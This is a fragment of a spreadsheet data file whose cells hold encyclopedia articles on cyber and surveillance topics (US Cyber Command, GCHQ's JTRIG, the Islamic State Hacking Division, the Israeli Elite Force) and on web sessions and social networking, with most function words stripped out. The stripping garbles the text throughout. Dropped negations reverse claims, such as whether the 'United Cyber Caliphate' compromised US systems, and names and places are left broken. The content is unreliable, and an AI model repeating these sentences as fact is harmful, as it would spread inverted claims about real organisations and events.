security breaches government business networks.since department defense rolled continually developed 'einstein' software aimed detecting preventing intrusion federal government networks. addition, "the department homeland security signed memorandum understanding improve collaboration agencies."the 2008 russian infiltration siprnet large reforms terms defense strategy. 2008, defense secretary robert gates moved create dedicated infrastructure dealing specializing cyber warfare strategy cyber command. cyber command originally designed colonel paul nakasone, lieutenant colonel easterly, navy captain white, force colonel stephen davis. these four became colloquially known 'the four horsemen' create framework cyber command, us's dedicated cyber-strategy wing.in 2016, cyber command gained separation nsa, elevating direct line white house. trump administration stretched team's authority, allowing take offensive approach cyber strategy. also classified website intellipedia niprnet siprnet tnet wikileaks julian assange chelsea manning references external links usmc jwics program disa data including jwics (ts/sci data)</t>
  </si>
  <si>
    <t>Session (web analytics)</t>
  </si>
  <si>
    <t>analytics, session, visit unit measurement user's actions taken within period time regard completion task. sessions also used operational analytics provision user-specific recommendations. there primary methods used define session: time-oriented approaches based continuity user activity navigation-based approaches based continuity chain requested pages. definition definition "session" varies, particularly applied search engines. generally, session understood consist sequence requests made single end-user visit particular site". context search engines, "sessions" "query sessions" least definitions. session query session queries made user particular time period also series queries navigations consistent underlying user need. uses sessions user used measurement website usage. other metrics used within research applied analytics include session length, user actions session. session length seen accurate alternative measuring page views.reconstructed sessions also used measure total user input, including measure number labour hours taken construct wikipedia. sessions also used operational analytics, data anonymization, identifying networking anomalies, synthetic workload generation testing servers artificial traffic. session reconstruction essential sessions analytics able identify them. this known "session reconstruction". approaches session reconstruction divided main categories: time-oriented, navigation-oriented. time-oriented approaches time-oriented approaches session reconstruction look period user inactivity commonly called "inactivity threshold." once period inactivity reached, user assumed left site stopped using browser entirely session ended. further requests user considered second session. common value inactivity threshold minutes sometimes described industry standard. some argued threshold minutes produces artifacts around naturally long sessions experimented thresholds. others simply state: time threshold effective identifying [sessions]".one alternative proposed using user-specific thresholds rather single, global threshold entire dataset. this problem assuming thresholds follow bimodal distribution, suitable datasets cover long period time. navigation-oriented approaches navigation-oriented approaches exploit structure websites specifically, presence hyperlinks tendency users navigate pages website clicking them, rather typing full browser. identifying sessions looking data build website: user's first page identified, "session" actions lasts land page cannot accessed previously-accessed pages. this takes account backtracking, user retrace steps opening page. simpler approach, take backtracking account, simply require http referer request page already session. not, session created. this class heuristics "exhibits poor performance" websites contain framesets. references bibliography arlitt, martin (2000). "characterizing user sessions" (pdf). sigmetrics performance evaluation review. (2): 50–63. doi:10.1145/362883.362920. s2cid 2946044. berendt, bettina; mobasher, bamshad; nakagawa, miki; spiliopoulou, myra (2003). "the impact site structure user environment session reconstruction usage analysis" (pdf). webkdd 2002 mining data discovering usage patterns profiles. webkdd. springer. doi:10.1007/978-3-540-39663-5_10. isbn 978-3-540-39663-5. catledge, pitkow, (1995). "characterizing browsing strategies world-wide web" (pdf). proceedings third international world-wide conference technology, tools applications. (6): 1065–1073. doi:10.1016/0169-7552(95)00043-7. cooley, robert; mobasher, bamshad; srivastava, jaideep (1999). "data preparation mining world wide browsing patterns" (pdf). knowledge information systems. (1): 5–32. citeseerx 10.1.1.33.2792. doi:10.1007/bf03325089. issn 0219-3116. s2cid 1165622. donato, debora; bonchi, francesco; chi, (2010). want take notes?: identifying research missions yahoo! search pad" (pdf). proceedings 19th international conference world wide web. acm. doi:10.1145/1772690.1772724. s2cid 6951065. eickhoff, carsten; teevan, jaime; white, ryen; dumais, susan. (2014). lessons journey: query analysis within-session learning (pdf). proceedings seventh international conference search data mining. acm. 223–232. doi:10.1145/2556195.2556217. isbn 9781450323512. s2cid 14666769. gayo-avello, daniel (2009). survey session detection methods query logs proposal future evaluation" (pdf). information sciences. (12): 1822–1843. doi:10.1016/j.ins.2009.01.026. hdl:10651/8686. issn 0020-0255.{{dead link}|date=january 2017} geiger, r.s.; halfaker, (2014). using edit sessions measure participation wikipedia (pdf). proceedings 2013 conference computer supported cooperative work. acm. 861. doi:10.1145/2441776.2441873. isbn 9781450313315. s2cid 7166943. daqing; goker, ayse; harper, david (2002). "combining evidence automatic session identification". information processing management. (5): 727–742. doi:10.1016/s0306-4573(01)00060-7. issn 0306-4573. heer, jeffrey; chi, (2002). "separating swarm: categorization methods user sessions web" (pdf). proceedings sigchi conference human factors computing systems. acm. (1). doi:10.1145/503376.503420. s2cid 14018957. huang, chien‐kang; chien, lee‐feng; oyang, yen‐jen (2003). "relevant term suggestion interactive search based contextual information query session logs". journal american society information science technology. (7): 638–649. citeseerx 10.1.1.105.5584. doi:10.1002/asi.10256. jansen, bernard spink, amanda; saracevic, tefko (2000). "real life, real users, real needs: study analysis user queries web" (pdf). information processing management. (2): 207–227. citeseerx 10.1.1.155.1383. doi:10.1016/s0306-4573(99)00056-4. issn 0306-4573. jansen, bernard spink, amanda (2006). "how searching world wide web? comparison nine search engine transaction logs" (pdf). information processing management. (1): 248–263. doi:10.1016/j.ipm.2004.10.007. issn 0306-4573. jones, rosie; klinkner, kristina lisa (2008). beyond session timeout: automatic hierarchical segmentation search topics query logs (pdf). cikm acm. 699. doi:10.1145/1458082.1458176. isbn 9781595939913. s2cid 6548724. khoo, michael; pagano, joe; washington, anne recker, mimi; palmer, bart; donahue, robert (2008). "using metrics analyze digital libraries" (pdf). proceedings acm/ieee-cs joint conference digital libraries. acm. lam, heidi; russell, daniel; tang, diane (2007). "session viewer: visual exploratory analysis session logs". ieee symposium visual analytics science technology. ieee. mehrzadi, david; feitelson, dror (2012). extracting session data activity logs" (pdf). proceedings annual international systems storage conference. systor '12. acm. citeseerx 10.1.1.381.1956. doi:10.1145/2367589.2367592. isbn 978-1-4503-1448-0. s2cid 8820623. meiss, mark; duncan, john; gonçalves, bruno; ramasco, josé menczer, filippo (2009). "what's session: tracking individual behavior web" (pdf). proceedings 20th conference hypertext hypermedia. acm. arxiv:1003.5325. doi:10.1145/1557914.1557946. s2cid 6564335. menascé, daniel almeida, fonseca, mendes, (1999). methodology workload characterization e-commerce sites" (pdf). proceedings conference electronic commerce. acm: 119–128. doi:10.1145/336992.337024. isbn 1581131763. s2cid 7239612. murray, craig; lin, jimmy; chowdhury, abdur (2006). "identification user sessions hierarchical agglomerative clustering" (pdf). proceedings american society information science technology. (1): 1–9. doi:10.1002/meet.14504301312. ortega, j.l.; aguillo, (2010). "differences between sessions according origin visits" (pdf). journal informetrics. (3): 331–337. doi:10.1016/j.joi.2010.02.001. issn 1751-1577. spiliopoulou, myra; mobasher, bamshad; berendt, bettina; nakagawa, miki (2003). framework evaluation session reconstruction heuristics web-usage analysis" (pdf). informs journal computing. (2): 171–190. citeseerx 10.1.1.621.3037. doi:10.1287/ijoc.15.2.171.14445. issn 1526-5528. weischdel, birgit; huizingh, eelko (2006). website optimization metrics: case study (pdf). proceedings international conference electronic commerce. 463. doi:10.1145/1151454.1151525. isbn 978-1595933928. s2cid 2965255.</t>
  </si>
  <si>
    <t>Iris Challenge Evaluation</t>
  </si>
  <si>
    <t>iris challenge evaluation (ice) series events conducted managed national institute standards technology projects technology development evaluation iris recognition. industry, academia, research institutions outside u.s. allowed participate.the 2006 first large-scale, open, independent technology evaluation iris recognition. primary goals projects promote development advancement iris recognition technology assess state-of-the-art capability. projects open academia, industry research institutes. 2005 2005 technology development project iris recognition. consisted iris recognition challenge problem distributed potential participants. event took place august 2005 march 2006. primary goal 2005, recognition technology development project, promote advance iris recognition technology supports existing iris recognition efforts u.s. government. researchers interested iris recognition still obtain copies 2005 dataset. 2006 2006 consisted large-scale, open, independent technology evaluation iris recognition technology. guarantee accurate assessment, measured performance sequestered data (data previously seen researchers developers). standard dataset test methodology employed participants evenly evaluated. 2006 started june 15th, 2006 results event published march 2007. primary goal 2006 determine state-of-the-art capability automatic iris recognition technology establish performance baseline measure future progress. results effort provide design input future evaluations. 2006 large-scale evaluation report available 2006 webpage. sponsors intelligence advanced research projects agency (iarpa) department homeland security (dhs) criminal justice information services division technical support working group (tswg) national institute justice references external links gov/mbgc/ mbgc website mbgc blog frgc website frvt website website national institute standards technology intelligence advanced research projects agency department homeland security criminal justice information services division technical support working group (tswg) national institute justice</t>
  </si>
  <si>
    <t>Joint Threat Research Intelligence Group</t>
  </si>
  <si>
    <t>joint threat research intelligence group (jtrig) unit government communications headquarters (gchq), british intelligence agency. existence jtrig revealed part global surveillance disclosures documents leaked former national security agency contractor edward snowden. mission scope jtrig's mission includes using "dirty tricks" "destroy, deny, degrade [and] disrupt" enemies "discrediting" them, planting misinformation shutting communications. known "effects" operations, work jtrig become "major part" gchq's operations 2010. slides leaked snowden also disclose deployment "honey traps" sexual nature british intelligence agents. operations 2011, jtrig conducted denial-of-service attack (dos) activist network anonymous. other jtrig targets included government iran taliban afghanistan.campaigns operated jtrig broadly fallen categories; cyber attacks propaganda efforts. propaganda efforts (named "online covert action" utilize "mass messaging" "pushing [of] stories" medium twitter, flickr, facebook youtube. online "false flag" operations also used jtrig targets. jtrig also changed photographs social media sites, well emailing texting colleagues neighbours "unsavory information" targeted individual.a computer virus named ambassadors reception used gchq variety different areas" described slides "very effective." virus "encrypt itself, delete emails, encrypt files, [and] make [the] screen shake" sent adversaries. virus also block user logging computer. information obtained gchq also used "close access technical operations," targets physically observed intelligence officers, sometimes person hotels. telephone calls also listened hotel computers tapped, documents ask, "can influence hotel choice? cancel visits?".in "honey trap", identified target lured somewhere internet, physical location" friendly face", discredit them. "honey trap" described "very successful works" slides. disclosures also revealed technique "credential harvesting", journalists could used disseminate information identify non-british journalists who, manipulated, could give information intended target secret campaign, perhaps providing access interview. unknown whether journalists would aware manipulated.a jtrig operation gchq "significantly disrupt" communications taliban afghanistan "blizzard" faxes, phone calls text messages scheduled arrive every minute. specific jtrig operations also targeted nuclear programme iran negative information blogs attacking private companies, affect business relationships scupper business deals.jtrig also undertook cyber-operations part wider gchq mission prevent argentine takeover falkland islands. scope cyber tactics used operation unclear. name given jtrig's role operation quito.in june 2015, files published glenn greenwald revealed details jtrig's work covertly manipulating online communities internal activities within united kingdom. agencies jtrig says co-operates include metropolitan police, security service (mi5), national crime agency (nca), border agency, revenue customs (hmrc), national public order intelligence unit (npoiu). also involved calls "missions" various agencies described "customers", including bank england, department children, schools families. info-weapons held developed jtrig used send bulk email, spoof messages, impersonate facebook posts individuals entire countries, artificially increase traffic website change outcome online polls. also zersetzung cointelpro hacktivism internet manipulation state-sponsored internet sockpuppetry mass surveillance psychological warfare 77th brigade (united kingdom) references external links hacking online polls other ways british spies seek control internet intercept</t>
  </si>
  <si>
    <t>IronPort</t>
  </si>
  <si>
    <t>ironport systems, inc., headquartered bruno, california, company designed sold products services intended protect enterprises internet threats. ironport founded december 2000 scott banister scott weiss.it best known ironport antispam, senderbase email reputation service, email security appliances. these appliances modified freebsd kernel trademark asyncos. november 2003, ironport acquired spamcop filtering reporting service, stand-alone entity.cisco systems announced january 2007, would ironport deal valued us$830 million, completed acquisition june 2007. ironport integrated cisco security business unit.senderbase renamed sensorbase take account input database cisco devices provide. sensorbase allows devices build risk profile addresses, therefore allowing risk profiles dynamically created http sites smtp email sources. references external links "official site (archive)". official website. archived original january 2007. retrieved 2013.</t>
  </si>
  <si>
    <t>Islamic State Hacking Division</t>
  </si>
  <si>
    <t>islamic state hacking division (ishd) united cyber caliphate (ucc) merger several hacker groups self-identifying digital army islamic state iraq levant (isis/isil). unified organization comprises least four distinct groups, including ghost caliphate section, sons caliphate army (sca), caliphate cyber army (cca), kalashnikov e-security team. other groups potentially involved united cyber caliphate pro-isis media group rabitat al-ansar (league supporters) islamic cyber army (ica). evidence support direct involvement islamic state leadership. suggests external independent coordination pro-isis cyber campaigns united cyber caliphate (ucc) name. investigations also display alleged links russian intelligence group, apt28, using name guise wage western nations. concerns group's actions included online recruiting, website defacement, social media hacks, denial-of-service attacks, doxing 'kill lists.' group classified low-threat inexperienced history attacks requires level sophistication rely publicly available hacking tools.experts raised doubts source nature data released 'kill lists' containing personal information u.s. military personnel claimed stolen hacked u.s. government servers. there evidence united cyber caliphate (ucc) compromised u.s. systems. data included public, unclassified, often outdated information civilians, non-u.s. citizens, others built data breaches scraped data.u.s., french, german intelligence investigated attacks following french television channel tv5monde hack u.s. centcom twitter attack. three countries linked actions united cyber caliphate (ucc) russian intelligence group. history group first emerged hacking operations u.s. websites january 2015 cyber caliphate army (cca). march 2015, islamic state published "kill list" website included names, ranks, addresses u.s. military members.a pattern similar attacks emerged media coverage. least individual 'kill lists,' including personal information american, canadian, european citizens released march 2015 june 2016. april 2016, four groups united united cyber caliphate (ucc).in june 2016, middle east media research institute found revealed media alleged list approximately 8,300 people around world potential lone-wolf attack targets. successful attacks since mid-2014 australian airport website defaced. french tv5monde live feed hacked, social media hacked defaced message suis isis". french investigators later discounted this, instead suspecting involvement hacking group, apt28, allegedly linked russian government. isis hacks swedish radio station broadcasts recruitment song united states' military database hacked early august data pertaining approximately 1400 personnel posted online. secret british government emails hacked. emails pertained cabinet ministers. intrusion detected gchq. february 2016, caliphate cyber army (cca) carried bizarre hack website solar company historic town battle, england. customers diverted page featuring isis logo accompanied string chilling threats. “fear us,” page warned. islamic cyber army”. april 2016 (friday), islamic state hackers name successfully hacked australian websites coordinated attack australian business. some websites redirected website containing content. early april 2017, released kill list 8,786 people. 2019, islamic state affiliated hacking group hijacked targeted twitter handles using unknown vulnerability. references</t>
  </si>
  <si>
    <t>Israeli Elite Force</t>
  </si>
  <si>
    <t>israeli elite force (ief) hacktivism group founded days opisrael april 2013, responsible multiple high-profile computer attacks large scale online vandalism. targets include isps, domain registrars, commercial websites, educational institutions, government agencies. group's core members are: mitziyahu, buddhax, amenefus, bl4z3, r3str1ct3d, mute, cyb3rs74r, oshrio, aph3x, xxtr, kavim, md5c, cpt|sparrow, gal-, gr1sha, nyxman thegodofhell. views group mitziyahu, naming co-ordinator, instead leader. stating interviews daily beast, israeli channel news, more, mission regain israeli citizen confidence hackers. opisrael opposition opisrael coordinated cyberattack anti-israel groups individuals websites perceived israeli, chiefly denial-of-service attacks. timed april 2013, holocaust remembrance day, stated goal "erase israel internet". israeli elite force early start forming days prior attack, taking websites. opbirthcontrol opisraelbirthday opposition upon planning opisraelbirthday anti-israeli teams april 2014, launched opbirthcontrol, several groups individuals joining them. israeli elite force decided focus energy exposing participants anti-israel hacks. hacked named buddhax published document list hackers personal information including pictures taken computers. document created "buzz" twitted famous hacker jester, celebrity roseanne barr, talked media. group also released 45,000 usernames passwords government officials gaza ministry health references</t>
  </si>
  <si>
    <t>Issues relating to social networking services</t>
  </si>
  <si>
    <t>advent social networking services many issues spanning misinformation disinformation privacy concerns related public private personal data. spamming spamming online social networks quite prevalent. primary motivation spam arises fact user advertising brand would like others typically publicize brand social network. detecting spamming activity well studied developing semi-automated model detect spams. instance, text mining techniques leveraged detect regular activity spamming reduces viewership brings reputation credibility) public pages maintained facebook. online social networks like twitter, users evolved mechanisms report spammers studied analyzed. privacy privacy concerns social networking services raised growing concerns among users dangers giving much personal information threat sexual predators. users services also need aware data theft viruses. however, large services, myspace netlog, often work enforcement prevent incidents. addition, perceived privacy threat relation placing much personal information hands large corporations governmental bodies, allowing profile produced individual's behavior decisions, detrimental individual, taken. furthermore, issue control data information altered removed user may, fact, retained passed third parties. this danger highlighted controversial social networking site quechup harvested e-mail addresses users' e-mail accounts spamming operation.in medical scientific research, asking subjects information behaviors normally strictly scrutinized institutional review boards, example, ensure adolescents parents informed consent. clear whether rules apply researchers collect data social networking sites. these sites often contain great deal data hard obtain traditional means. even though data public, republishing research paper might considered invasion privacy.privacy social networking sites undermined many factors. example, users disclose personal information, sites take adequate steps protect user privacy, third parties frequently information posted social networks variety purposes. "for generation, social networking sites become preferred forum social interactions, posturing role playing simply sounding off. however, forums relatively easy access, posted content reviewed anyone interest users' personal information". government plans monitor traffic social networks. well, schemes similar e-mail jamming proposed networks twitter facebook. these would involve "friending" "following" large numbers random people thwart attempts network analysis. privacy concerns found differ users according gender personality. women less likely publish information reveals methods contacting them. personality measures openness, extraversion, conscientiousness found positively affect willingness disclose data, neuroticism decreases willingness disclose personal information.another debate lies design algorithmic systems target specific audiences social networking sites. with multiple formats marketing, facebook offers variety direct marketing options advertisers reach intended audience. example, appear suggested posts home news feed right side feed banner. businesses create page outline company post related information, promotions contact information directly reaching interested audience. users "like" business page subscribed receive business' updates home news feed. banner suggested posts paid marketers advertisers reach intended audience. like methods marketing, emotional connections critical reaching user. from fourth quarter 2012 fourth quarter 2013, facebook increased advertising click-through rate 365%, million promoted suggested posts user's news feeds. this surge posts resulted influx information difficult organize. study emotional responses advertising facebook found business pages found highest appeal users recommended liked user user's friends. “liked” pages higher credibility users. however, change algorithm announced april 2014, said business pages receiving reduced reach engaging “click bait” tactics (fooling users click links things discretely said facebook). quantity engagement facebook posts measured, relaying important information user audience actions online.the debate questions extent design systems compromising needs, privacy information users. more research needed evaluate allowing advertising access user information specifically tailor content choices interactions, example placing within personal feeds throughout site, compromising user's information social wellbeing. john herrman (2018) compares function algorithms adjusting content omniscience recounts unpleasant experiences coincide result. calls browsing amazon, products browsed briefly reappear news feeds, including instagram feed. outlines experience networks “[have] eyes everywhere,” suggests looming omniscience alter interact online, even “risk driving away followers process.” this deter users engaging social interactions online points much advertisers able tailor information intended audience. this debate ignited early 2018. april 2018, mark zuckerberg testified congress questions defining facebook's policy, information handling data design systems. congress placed emphasis addressing facebook's tracking user data online, skeptical social networking site regulate itself. data mining through data mining, companies able improve sales profitability. with data, companies create customer profiles contain customer demographics online behavior. recent strategy purchase production "network analysis software". this software able sort influx social networking data specific company. facebook especially important marketing strategists. facebook's controversial "social ads" program gives companies access millions profiles order tailor facebook user's interests hobbies. however, rather sell actual user information, facebook sells tracked "social actions". that track websites user uses outside facebook program called facebook beacon. notifications there trend social networking sites send "positive" notifications users. example, sites bebo, facebook, myspace send notifications users removed person's friends list. likewise, bebo send notification user moved another user's friends list notification sent moved list. this allows users purge undesirables list extremely easily often without confrontation since user rarely notice person disappears friends list. also enforces general positive atmosphere website without drawing attention unpleasant happenings friends falling out, rejection failed relationships. access information many social networking services, facebook, provide user choice view profile. this supposed prevent unauthorized users accessing information. parents want access child's myspace facebook account become problem teenagers want profile seen parents. making profile private, teens select page, allowing people added "friends" view profile preventing unwanted viewing profile parents. most teens constantly trying create structural barrier private life parents. edit information certain social networking service account, social networking sites require provide password. this designed prevent unauthorized users adding, changing, removing personal information, pictures, data. impact employability social networking sites created issues among getting hired jobs losing jobs exposing inappropriate content, posting photos embarrassing situations posting comments contain potentially offensive comments (e.g., racist, homophobic defamatory comments), even political comments contrary employer. there works recommend friends social networking users based political opinions. many people social networking sites express personal opinions current events news issues friends. potential applicant expresses personal opinions political issues makes potentially embarrassing posts online publicly available social networking platform, employers access employees' applicants' profiles, judge based social behavior political views. according silicon republic's statistics, 17,000 young people countries interviewed survey. people aged rejected comments made online profile. this shows effects social networks people's lives. there numerous cases employees lost jobs opinions represented companies negatively. september 2013, woman fired facebook posted disruptive information company stating military patrons receive special treatment discounts. manager company found opinion online, disagreed fired went company's mission statement. november 2012, woman posted racist remark president united states mentioned possible assassination. lost job, investigation secret service.not employees lost jobs united states, happened social network users internationally. april 2011, lloyd's banking group employee united kingdom fired making sarcastic post higher salary boss relation hers. february 2013 another case flight attendant working russian airline lost posted photo giving middle finger plane full passengers. photo went viral exposing internet. november 2009, woman working quebec, canada, lost company's health insurance benefits posted photos displaying mental health problem. company decided benefits costing additional funds.cases like created privacy implications whether companies right look employees' social network profiles. march 2012, facebook decided might take legal action employers gaining access employee's profiles passwords. according facebook chief privacy officer policy, erin egan, company worked hard give users tools control sees information. also said users forced share private information communications job. according network's statement rights responsibilities, sharing soliciting password violation facebook. employees still give password information job, according erin egan, facebook continue part protect privacy security users. potential misuse relative freedom afforded social networking services caused concern regarding potential misuse individual patrons. october 2006, fake myspace profile created name josh evans lori janine drew suicide megan meier. event incited global concern regarding social networking services bullying purposes. july 2008, briton former friend ordered total £22,000 (about us$44,000) libel breach privacy. posted fake page facebook purporting former school friend matthew firsht, fallen 2000. page falsely claimed firsht homosexual dishonest.at time, genuine social networking services treated suspicion ground services' misuse. september 2008, profile australian facebook user elmo keep banned site's administrators grounds violated site's terms use. keep several users facebook banned site presumption names real, bear resemblance names characters like sesame street's elmo.online social networks also become platform spread rumors, study analyzed rumors retrospect. approaches detect rumors misinformation) compare spread topic social network (say twitter) spread reliable authorized news agencies. unauthorized access there different forms user data social networks accessed updated without user's permission. study highlighted common incidents included inappropriate comments posted social networking sites (43%), messages sent contacts never authored (25%) change personal details (24%). incidents carried victim's friends (36%) partners (21%) victims ex-partner logged account without prior consent. survey found online social network accounts subject unauthorized access million cases 2011. risk child safety citizens governments concerned misuse social networking services children teenagers, particular relation online sexual predators. instance, study suggests children inappropriate content youtube. overuse social networking also make children susceptible depression anxiety. governments taking action better understand problem find solutions. 2008 panel concluded technological fixes verification scans relatively ineffective means apprehending online predators. 2010, child pornography social networking site hundreds members dismantled enforcement. deemed "the largest crimes children case brought anywhere anyone". girls particular also known risk online using social networks boys. according article, high tech high risks: moral panics about girls online, suggests young girls risks often represented "products play" transgressive poses often manipulate users online making look older actually appear attract sexual predators. many parents teenage girls worry safety online many manipulations online social networking sites.social networking also risk child safety another way; parents addicted games neglect children. instance south korea resulted death child starvation. enforcement agencies published articles recommendations parents children's social networking sites. trolling social networking sites facebook occasionally used emotionally abuse, harass bully individuals, either posting defamatory statements forwarding private digital photos videos adverse impact individuals depicted videos. such actions often referred "trolling". confrontations real world also transferred online world. trolling occur many different forms, (but limited defacement deceased person(s) tribute pages, name-calling, playing online pranks individuals making controversial inflammatory comments intention cause anger cause arguments. individuals troll many reasons. psychology behind people troll according psychology today anonymity, perceived obscurity, perceived lack consequences online misbehavior. trolls also activities perceived majority status, social identity salience sense troll surrounded online 'friends'. trolls also engage harmful acts desensitization negative personality traits (fox, 2014). eight reasons behind thought processes trolls suggest individuals thrive behind able create false identity pseudonym hide behind premise 'friends' social networks agree outlook certain topics, thus join trolling. reason perceived lack consequences believe created identity seen real life human persona/avatar created, leads feel face consequences online troll. trolling prominent issue 2010s, internet social media consistently expanding individuals sign social networking sites, people come fire become target trolls. people sign social networking sites, celebrities also becoming prominent sites. with variety celebrities joining social networking sites, trolls tend target abuse towards them. with famous people gaining influx negative comments slew abuse trolls causes 'quit' social media. prime example celebrity quitting social media stephen fry. left twitter "too much aggression unkindness around" emphasizing trolls negatively impact people's lives (cohen, 2014). celebrities face trolls backlash social media forcing quit, mean become less touch fans, potentially losing base, relevant people enjoy interacting celebrities makes feel though valued. trolling lead celebrities deleting social networks twitter, emphasizes trolls win, ruin people's lives. while trolls believe face consequences troll others internet without repercussions, 2000s, high-profile cases cyberbullies allegedly factors suicides attributed bullying, laws place governments. trolls face going prison certain actions take internet, spreading hate speech racist messages. highest profile cases racist trolling. racist trolling seen individuals sent prison tweets sent seemed harmless racist. case recent years liam stacey jailed fifty-six days tweeting offensive messages 'muamba dead, hahahaha', referring footballer fabrice muamba collapsed professional football game bolton wanders (williams, 2012). this highlights offensive tweets messages sent social networking platform repercussions individuals aware face consequences actions. radicalization social networking sites allow greater spread ideas previously possible. however, side effect allowing fringe political and/or economic views, white nationalists, terrorists, racists neo-nazis, easily spread propaganda convert others ideology. this fact social networking sites often algorithms finding content, algorithms trap users ‘echo chamber’ ‘rabbit hole’ allows easier radicalization. risk, many social networking sites measures place prevent hate speech radicalization, though controversial argument they, intentionally not, limit free speech internet. online bullying online bullying, also called cyberbullying, relatively common occurrence often result emotional trauma victim. depending networking outlet, users admit "cyber-bullied". article, "why youth (heart) social network sites", danah boyd, published december 2007, researcher social networks, quotes teenager. teenager expresses frustration towards networking sites like myspace causes drama much emotional stress. there many limitations individuals post online. individuals given power post offensive remarks pictures could potentially cause great amount emotional pain another individual. interpersonal communication interpersonal communication growing issue people turned social networking means communication. "benniger (1987) describes mass media gradually replaced interpersonal communication socializing force. further, social networking sites become popular sites youth culture explore themselves, relationships, share cultural artifacts".the convenience social network sites give users communicate another also damage interpersonal communication. sherry turkle, founder director initiative technology self, stated, "networked, together, lessened expectations feel utterly alone. risk come others objects accessed--and parts find useful, comforting, amusing". furthermore, social network sites create insincere friendships, turkle also noted, "they nurture friendships social-networking sites wonder among friends. they become confused companionship". psychological effects social networking social networking sites risen popularity past years, people spending excessive amount time internet general social networking sites specific. this researchers debate establishment internet addiction actual clinical disorder. social networking also affect extent person feels lonely. newsweek article, johannah cornblatt explains "social-networking sites like facebook myspace provide people false sense connection ultimately increases loneliness people feel alone." john cacioppo, neuroscientist university chicago, claims social networking foster feelings sensitivity disconnection, lead loneliness. fabio sabatini francesco sarracino found individual tends trust people significant number face-to-face interactions, individual likely assess well-being relatively high. researchers found online social networking plays positive role subjective well-being networking used facilitate physical interactions, networking activities facilitate face-to-face interactions tend erode trust, erosion negatively affect subjective well-being (independent online social interaction itself). sabatini sarracino conclude "the overall effect networking individual welfare significantly negative."however, scholars expressed concerns social networking often exaggerated poorly researched. social media argued positive influence society giving highly introverted socially inept risk means communication removes interpersonal cues could cause anxiety panic attacks. also argued among academics correct moderation authority figure boss parent improve perceived well individual navigates social media. well variety longitudinal studies look children start social media digital present, finding correlation social media screen time mental health. patents there rapid growth number u.s. patent applications cover technologies related social networking. number published applications growing rapidly since 2003. there 3,500 published applications. many 7,000 applications currently file including published yet. only applications issued patents, however, largely multi-year backlog examination business method patents difficulty getting patent applications allowed.it reported social networking patents important establishment start-up companies. also reported, however, social networking patents inhibit innovation. june 2010, united states patent trademark office awarded amazon.com patent "social networking system" based ownership planetall. patent describes social networking system networked computer system provides various services assisting users locating, establishing contact relationships with, users. example, embodiment, users identify users based affiliations particular schools organizations. system also provides mechanism user selectively establish contact relationships connections users, grant permissions users view personal information user. system also include features enabling users identify contacts respective contacts. addition, system automatically notify users personal information updates made respective contacts. patent garnered attention similarity popular social networking site facebook. workers' rights what types speech workers protected fired social networking websites issue american companies complaints 2011 topic made national labor relations board (nlrb). national labor relations protects workers fired protected concerted activity, prevents workers fired collective action, allowing companies right fire workers individual actions take company. companies concerned potential damage comments online public image visibility accessibility, despite cases presented thus nlrb formal ruling, leaving uncertainty boundaries types speech nlrb ultimately protect condemn. centralized architecture most existing sites multiple dedicated data centers serve users. such infrastructure-based systems faces over-provisioning non-peak hours, encounter service outage peak hours, highly dynamic users' activities. there several proposals, leveraging decentralized architecture ensure scalability sites infrastructure cost. these proposals include fethr, uaosn, cuckoo. virtual identity suicide there growing number social network users decide quit user account committing so-called virtual identity suicide suicide. 2013 study journal cyberpsychology, behavior, social networking investigated phenomenon perspective facebook users. number reason users privacy concerns (48%), followed general dissatisfaction social networking website (14%), negative aspects regarding social network friends (13%) feeling getting addicted social networking website (6%). facebook quitters found concerned privacy, addicted internet conscientious. breaking sites facebook becoming increasingly popular tools methods ending relationships friendships, proving although media used tool connecting individuals, creating problems associated disconnecting others. instead traditional phone call face-to-face interaction individuals, people starting relationships simply changing relationship status, knowing full well partner soon problem left closure entire online world knows longer relationship. 2010 study conducted online, nearly one-quarter 1,000 individuals surveyed found relationship seeing facebook. media websites made private lives much public, especially comes breaking since updates able immediately viewed everyone networks (which tend people would normally tell personally); example, friends comment newly changed "single" relationship status, explain happened distressing. this creates problems, even crucial 'save face' one's relationship broken connected media technologies. erving goffman argues social life boils face-to-face interactions. these interpersonal interactions mediated goffman terms "face-work", actions undertaken maintain consistency one's face uphold expressive order social situations. individuals attempt keep positive image self interacting others, order alter appearance manner way. such face-work also seen technologies, especially social media websites facebook. someone breaks you, actively choose "face" want present friends, including choose either post updates, natural thing would want "save face" posting happy updates pictures going friends. even though absolutely heartbroken within, facebook allows hide true feelings online world, manipulating profile. media utilized tool helping users present desirable image themselves, enabling save face difficult situations. nearly respondents study admitted using facebook status make someone think plans, even not.many people find really move past relationship person life completely. social media made process much complicated difficult. 2012 study, participants stated remained friends facebook, people, stated 'creeped' breakup. many digital social networking sites leave behind trail user's interactions, deleting content arduous process, difficult simply burning throwing away entire letters, photos, mementos. additionally, content still remain online. social overload increasing number messages social relationships embedded also increases amount social information demanding reaction users. consequently, users perceive giving much social support friends. this dark side usage called 'social overload'. caused extent usage, number friends, subjective social support norms, type relationship (online-only offline friends) indirect effect. psychological behavioral consequences social overload include perceptions exhaustion, user satisfaction, high intentions reduce stop using sns. social anxiety smartphones social networking services enable stay connected continuously people around away however sometimes root anxiety social life. eagerness know everyone saying tendency anyone shared things typical "symptoms" anxiety called fomo. there study examined possible connections fomo social media engagement indicating fomo associated lower need satisfaction, mood life satisfaction.another type social anxiety fobm (fear missed). comes situation can't produce share-content people consume. fobm counterpart fomo; however, compared fomo serious impact since exclusion conversation result continuous exclusion later. effects personal relationships social capital number contacts social platform sometimes considered indicator social capital. however, studies show rather indicator self-esteem form social compensation. indeed, people tend friends compensate self-esteem high correlation number "friends" social media platforms feeling social anxiety, leading symptoms major depression dysthymia. consider aspect regards relationships maintained social media platforms, easily point change understanding friendship. matter fact, online platforms social media services altered definition friendship. indeed, friendship "redoubleth joys, cutteth griefs halves" stated francis bacon. however, nowadays facebook friends, instance, encourage negative feelings, envy, revenge sadness. when comes friendship, wonder whether friendship online platforms real form friendship, sort metaphor compensate social communication problems. actually, changes spotted definition compared social media. friendship used relate public sphere explained nicomachean ethics, however nowadays friendship rather exposed publicly different social media platforms.croom found facebook users know thirds "friends" platform, meaning know one-third individuals friend-lists. this raises security privacy issues project researchers alerted participants would better unfriend people recognize. references</t>
  </si>
  <si>
    <t>John Walker (programmer)</t>
  </si>
  <si>
